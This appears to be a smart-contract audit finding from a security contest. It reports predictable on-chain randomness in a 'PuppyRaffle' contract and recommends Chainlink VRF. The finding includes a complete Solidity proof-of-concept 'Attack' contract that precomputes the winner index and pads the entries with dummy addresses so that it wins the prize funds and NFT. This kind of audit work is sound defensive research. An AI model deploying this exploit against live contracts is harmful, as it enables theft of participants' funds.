The raffle winner is selected using fully predictable and attacker-controlled inputs:
msg.sender → controlled by attacker
block.timestamp → miner / validator controlled
block.difficulty → predictable / manipulable (and deprecated on PoS)
An attacker can deterministically force the winner index by:
Choosing the caller address
Choosing when to call selectWinner()
Replaying the computation off-chain before sending the transaction
This allows guaranteed wins and unfair manipulation of raffle outcomes.
Likelihood:
Requires no special permissions
Can be executed by any participant
Computation is trivial off-chain
Impact:
Attacker can force themselves to win
Raffle fairness is completely broken
NFT rarity farming possible
Economic manipulation of prize distribution
This defeats the core purpose of the protocol.
The following POC demonstrates that the attacker can ensure that the desired player index wins
Use Chainlink VRF, it ensures:
True randomness
Verifiable
Industry standard
## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.
The contest is live. Earn rewards by submitting a finding.
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsThe contest is complete and the rewards are being distributed.